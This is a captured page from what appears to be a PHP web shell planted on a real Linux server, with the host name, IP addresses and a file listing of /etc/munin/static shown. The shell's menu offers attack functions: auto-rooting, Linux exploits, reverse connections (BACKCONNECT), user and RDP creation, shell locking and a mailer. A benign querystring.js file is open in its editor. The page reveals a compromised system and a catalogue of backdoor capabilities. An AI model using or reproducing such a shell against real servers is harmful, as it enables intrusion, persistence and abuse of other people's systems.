Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
munin /
static /
[ HOME SHELL ]
Name
Size
Permission
Action
definitions.html
2.49
KB
-rw-r--r--
dynazoom.html
6.56
KB
-rw-r--r--
favicon.ico
2
KB
-rw-r--r--
formatdate.js
12.41
KB
-rw-r--r--
logo-h.png
1.75
KB
-rw-r--r--
logo.png
473
B
-rw-r--r--
querystring.js
1.08
KB
-rw-r--r--
style-1.2.css
3.53
KB
-rw-r--r--
style-new.css
3.95
KB
-rw-r--r--
style.css
5.23
KB
-rw-r--r--
zoom.js
4.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : querystring.js
/* Client-side access to querystring name=value pairs Version 1.3 28 May 2008 License (Simplified BSD): http://adamv.com/dev/javascript/qslicense.txt */ function Querystring(qs) { // optionally pass a querystring to parse this.params = {}; var query_string = window.location.search; if (qs == null) qs = query_string.substring(1, query_string.length); if (qs.length == 0) return; // Turn <plus> back to <space> // See: http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4.1 qs = qs.replace(/\+/g, ' '); var args = qs.split('&'); // parse out name/value pairs separated via & // split out each name=value pair for (var i = 0; i < args.length; i++) { var pair = args[i].split('='); var name = decodeURIComponent(pair[0]); var value = (pair.length==2) ? decodeURIComponent(pair[1]) : name; this.params[name] = value; } } Querystring.prototype.get = function(key, default_) { var value = this.params[key]; return (value != null) ? value : default_; } Querystring.prototype.contains = function(key) { var value = this.params[key]; return (value != null); }
Close